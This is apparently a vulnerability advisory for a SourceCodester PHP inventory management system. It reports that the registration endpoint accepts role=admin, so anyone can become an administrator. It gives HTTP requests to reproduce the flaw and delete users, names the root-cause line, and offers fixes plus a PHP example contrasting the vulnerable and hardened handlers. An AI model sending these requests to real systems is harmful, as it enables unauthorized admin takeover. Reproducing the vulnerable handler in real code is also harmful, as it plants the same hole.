| Title | SourceCodester Inventory Management System NA Improper Access Controls |
|---|
| Description | Summary
The user registration endpoint at POST /api/users_handler.php accepts a role parameter directly from user input without server-side validation. Any unauthenticated visitor can register an account with role=admin, granting immediate access to the admin panel, user management (create/delete/modify users), and all administrative functions. No privileges, approval workflow, or additional verification is required.
Vulnerability Details
Vulnerability Type: Broken Access Control — Privilege Escalation via Mass Assignment
CVSS 3.1 Score: 9.8 (Critical) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Endpoint: POST /api/users_handler.php with action=register
Vulnerable Parameter: role (line 38 of api/users_handler.php)
Steps to Reproduce
Environment:
- Target: http://localhost/Product_Inventory/
- Attacker: Unauthenticated (no account needed)
Steps:
1. Send the following request to register a new admin account:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=register&username=attacker&password=attacker123&full_name=Attacker+User&role=admin
2. Observe the successful response:
{"success":true,"message":"User registered successfully!"}
3. Log in with the newly created admin account:
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=login&username=attacker&password=attacker123
4. Response confirms successful authentication:
{"success":true,"message":"Login successful!"}
5. Access admin-only endpoints (verified):
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=<session_cookie>
action=get_user&id=1
Response returns full admin user details:
{"id":1,"username":"admin","full_name":"GANESH DUTT","role":"admin"}
6. Modify or delete any user (verified):
POST /Product_Inventory/api/users_handler.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=<session_cookie>
action=delete_user&id=3
Response:
{"success":true,"message":"User deleted successfully!"}
Expected: Self-registration should only ever create staff accounts. The role should be fixed server-side in the registration flow, and admin accounts should be created only through an action that requires an existing administrator.
Actual: Any unauthenticated visitor can self-assign the admin role during registration.
Root Cause
The vulnerable code at api/users_handler.php:38 directly assigns the user-supplied role parameter:
$role = $_POST['role'] ?? 'staff';
This value is then inserted into the database without validation:
$stmt = $pdo->prepare("INSERT INTO users (username, password, full_name, role) VALUES (?, ?, ?, ?)");
$stmt->execute([$username, $hashed_password, $full_name, $role]);
Impact
An unauthenticated attacker can:
1. Create admin accounts — Register with role=admin to gain full administrative access
2. Delete any user — Remove legitimate admin accounts via delete_user action
3. Modify user credentials — Change passwords, usernames, and roles of any account via update_user
4. Access admin panel — View user management interface at users.php
5. Full system compromise — Combined with stored XSS vulnerabilities, achieve persistent admin session hijacking
This is a complete failure of the application's authorization model rather than a bypass of authentication: the attacker does log in, but with credentials they chose themselves, and lands at the highest privilege level in the application without any preconditions.
Recommended Fix
Remove the role parameter from user-controlled input during registration. Hardcode the default role:
case 'register':
$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
$full_name = $_POST['full_name'] ?? '';
// FIX: Always assign 'staff' role during self-registration
$role = 'staff';
If admin account creation is needed, implement a separate endpoint protected by requireAdmin():
case 'create_admin':
requireAdmin();
$role = 'admin';
// ... rest of registration logic
Additionally, on the endpoints that legitimately accept a role from an administrator (create_admin, update_user), validate it against an allowlist as a defense-in-depth measure. Note that this allowlist is not a substitute for the fix above: applied to self-registration it would still accept role=admin, since 'admin' is an allowed value.
$allowed_roles = ['staff', 'admin'];
if (!in_array($role, $allowed_roles)) {
echo json_encode(['success' => false, 'message' => 'Invalid role.']);
exit;
} |
|---|
| User | Anonymous User |
|---|
| Submitted | 2026-05-31 04:23 PM (29 days ago) |
|---|
| Moderation | 2026-06-28 08:22 PM (28 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 374576 [SourceCodester Inventory Management System 1.0 User Registration Endpoint /api/users_handler.php role privilege escalation] |
|---|
| Points | 17 |
|---|
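The Recommended Fix section above shows the hardened register case only as a fragment and leaves the admin-creation path elided. The following is an added example, not code from the SourceCodester project or the submitter, that puts the vulnerable handler and the hardened one side by side and runs both against an in-memory SQLite database so the difference in the stored role can be observed offline. It assumes a users table with the columns named in the advisory, the pdo_sqlite extension, and models requireAdmin() as a check on a session array (the project's real helper is not shown on the page). Feeding it the exact forged form body from the advisory, the vulnerable handler stores role admin, the hardened handler stores staff, and the admin-only creation path refuses a staff session before it ever consults the role allowlist.

```php
<?php
// Added example (not the project's code): vulnerable vs. hardened registration
// for the role mass-assignment issue in api/users_handler.php. Assumptions: the
// users table below matches the advisory's INSERT; requireAdmin() is modelled as
// a session-role check; pdo_sqlite is available.
declare(strict_types=1);

const ALLOWED_ROLES = ['staff', 'admin'];

function setupDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT UNIQUE NOT NULL,
        password TEXT NOT NULL,
        full_name TEXT NOT NULL,
        role TEXT NOT NULL)');
    return $pdo;
}

function insertUser(PDO $pdo, string $username, string $password, string $fullName, string $role): array
{
    $stmt = $pdo->prepare('INSERT INTO users (username, password, full_name, role) VALUES (?, ?, ?, ?)');
    $stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT), $fullName, $role]);
    return ['success' => true, 'message' => 'User registered successfully!'];
}

// Vulnerable: trusts $post['role'] (mass assignment), as at api/users_handler.php:38.
function vulnerableRegister(PDO $pdo, array $post): array
{
    $role = $post['role'] ?? 'staff';
    return insertUser($pdo, $post['username'] ?? '', $post['password'] ?? '', $post['full_name'] ?? '', $role);
}

// Hardened: the role is never read from the request; self-registration is always 'staff'.
function hardenedRegister(PDO $pdo, array $post): array
{
    $username = trim($post['username'] ?? '');
    $password = $post['password'] ?? '';
    $fullName = trim($post['full_name'] ?? '');
    if ($username === '' || $password === '' || $fullName === '') {
        return ['success' => false, 'message' => 'All fields are required.'];
    }
    return insertUser($pdo, $username, $password, $fullName, 'staff');
}

// Admin-only creation path: authorization first, then allowlist validation of the
// role an administrator chose. The allowlist alone would not stop an anonymous
// caller from sending role=admin, so the session check is the essential control.
function createUserAsAdmin(PDO $pdo, array $post, array $session): array
{
    if (($session['role'] ?? null) !== 'admin') {   // stand-in for requireAdmin()
        return ['success' => false, 'message' => 'Admin access required.'];
    }
    $role = $post['role'] ?? 'staff';
    if (!in_array($role, ALLOWED_ROLES, true)) {
        return ['success' => false, 'message' => 'Invalid role.'];
    }
    return insertUser($pdo, $post['username'] ?? '', $post['password'] ?? '', $post['full_name'] ?? '', $role);
}

function roleOf(PDO $pdo, string $username): ?string
{
    $stmt = $pdo->prepare('SELECT role FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['role'];
}

// Constructed input: the forged form body from the advisory's step 1.
$forged = ['username' => 'attacker', 'password' => 'attacker123',
           'full_name' => 'Attacker User', 'role' => 'admin'];

$pdo = setupDb();
vulnerableRegister($pdo, $forged);
echo 'vulnerable handler stored role: ', roleOf($pdo, 'attacker'), PHP_EOL;

$pdo = setupDb();
hardenedRegister($pdo, $forged);
echo 'hardened handler stored role: ', roleOf($pdo, 'attacker'), PHP_EOL;

$asStaff = createUserAsAdmin($pdo, ['username' => 'admin2'] + $forged, ['role' => 'staff']);
$asAdmin = createUserAsAdmin($pdo, ['username' => 'admin2'] + $forged, ['role' => 'admin']);
echo 'create_admin from staff session: ', $asStaff['message'], PHP_EOL;
echo 'create_admin from admin session: ', $asAdmin['message'], ' (stored role: ', roleOf($pdo, 'admin2'), ')', PHP_EOL;
```

Run it with `php example.php`. The important design point is the order of checks in createUserAsAdmin: the role allowlist is consulted only after the caller has been confirmed as an administrator, so the allowlist never becomes the thing standing between an anonymous visitor and the admin role.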